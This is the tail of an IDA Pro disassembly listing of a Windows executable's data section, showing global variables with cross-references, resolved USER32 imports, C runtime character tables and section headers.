dword_46BCDC dd 7 dup(0) dword_46BCF8 dd 0 ; sub_41E67B+5C�o
dword_46BCFC dd 0 dword_46BD00 dd 0 dword_46BD04 dd 0 dword_46BD08 dd 77C2807Ch ; sub_41E79E+38�r ...
align 10h
dword_46BD10 dd 0 ; sub_41EA02+63�w ...
align 8
dword_46BD18 dd 0 ; sub_41EA02+46�r
dword_46BD1C dd 10h dup(0) word_46BD5C dw 0 ; DATA XREF: sub_41EC60+A8�r
word_46BD5E dw 0 ; DATA XREF: sub_41EA02+54�r
; sub_41EC60+DB�r ...
word_46BD60 dw 0 ; DATA XREF: sub_41EC60+CA�r
word_46BD62 dw 0 ; DATA XREF: sub_41EC60+D3�r
; sub_41EC60:loc_41ED52�r
word_46BD64 dw 0 ; DATA XREF: sub_41EC60+C0�r
word_46BD66 dw 0 ; DATA XREF: sub_41EC60+B8�r
word_46BD68 dw 0 ; DATA XREF: sub_41EC60+B0�r
word_46BD6A dw 0 ; DATA XREF: sub_41EC60+9E�r
dword_46BD6C dd 0 dword_46BD70 dd 10h dup(0) word_46BDB0 dw 0 ; DATA XREF: sub_41EC60+46�r
word_46BDB2 dw 0 ; DATA XREF: sub_41EA02:loc_41EA79�r
; sub_41EC60+78�r ...
word_46BDB4 dw 0 ; DATA XREF: sub_41EC60+67�r
word_46BDB6 dw 0 ; DATA XREF: sub_41EC60+70�r
; sub_41EC60:loc_41ECE4�r
word_46BDB8 dw 0 ; DATA XREF: sub_41EC60+5D�r
word_46BDBA dw 0 ; DATA XREF: sub_41EC60+55�r
word_46BDBC dw 0 ; DATA XREF: sub_41EC60+4D�r
word_46BDBE dw 0 ; DATA XREF: sub_41EC60+3E�r
dword_46BDC0 dd 0 dword_46BDC4 dd 0 ; sub_41EA02:loc_41EB4E�r ...
dword_46BDC8 dd 0 dword_46BDCC dd 0 ; resolved to->USER32.MessageBoxA ; sub_41EF8E+2E�w ...
dword_46BDD0 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_41EF8E:loc_41EFDD�r
dword_46BDD4 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_41EF8E+60�r
dword_46BDD8 dd 0 dword_46BDDC dd 0 ; sub_41FB6B+6D�o
dword_46BDE0 dd 0 ; sub_41FB6B+44�o
dword_46BDE4 dd 0 ; sub_41FB6B+37�o
dword_46BDE8 dd 0 ; sub_41FB6B+51�o
align 10h
dword_46BDF0 dd 0 ; sub_420119+48�w ...
byte_46BDF4 db 0 ; DATA XREF: sub_404EA5�r sub_404EA5+9�w ...
align 4
dword_46BDF8 dd 8A27A0h ; sub_418A10+14�r ...
align 10h
dword_46BE00 dd 400h dup(0) ; .text:0043AB10�o
dword_46CE00 dd 200h ; sub_418769+56�r ...
dd 7 dup(0)
dword_46CE20 dd 8A0650h ; sub_41C178+75�r ...
dword_46CE24 dd 3Fh dup(0) dword_46CF20 dd 20h ; sub_41C251+C�r ...
dword_46CF24 dd 4E4h ; sub_41C85D+65�w ...
align 10h
dword_46CF30 dd 3 dup(0) ; sub_41C85D+171�o ...
dword_46CF3C dd 0 ; sub_41C85D+15D�w ...
byte_46CF40 db 0 ; DATA XREF: sub_41CA9C:loc_41CBA8�w
; sub_41CA9C:loc_41CBC5�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_46D040 db 0 ; DATA XREF: sub_41C85D+5C�o
; sub_41C85D+AF�o ...
byte_46D041 db 0 ; DATA XREF: sub_4171E8+5D�r
; sub_41C85D+A0�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_46D144 dd 0 ; sub_41C85D+12B�w ...
dword_46D148 dd 0 ; sub_41931A+5�r ...
dword_46D14C dd 0 ; sub_418CE8+25A�r ...
dword_46D150 dd 0 ; sub_418CE8+311�w ...
dword_46D154 dd 0 ; sub_418CE8+22D�r ...
dword_46D158 dd 0 ; sub_418CBD�r ...
dword_46D15C dd 0 ; sub_418CBD+8�r ...
dword_46D160 dd 0 ; sub_41737F+5C�r ...
dword_46D164 dd 8A0000h ; sub_415C9B+5A�r ...
dword_46D168 dd 1 dword_46D16C dd 142340h ; sub_41D05F+F�r ...
dword_46D170 dd 1 ; sub_41FCDD�r
dword_46D174 dd 1 ; sub_41CC21+11�w ...
dword_46D178 dd 8A2718h ; sub_416663:loc_4166A5�r ...
dword_46D17C dd 8A2718h ; sub_416663+C�r ...
byte_46D180 db 0 ; DATA XREF: sub_4209C4+15�r
; sub_4209C4+1E�w
align 1000h
_text ends
; Section 3. (virtual address 0006F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0006F000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 46F000h
align 2000h
_idata2 ends
end start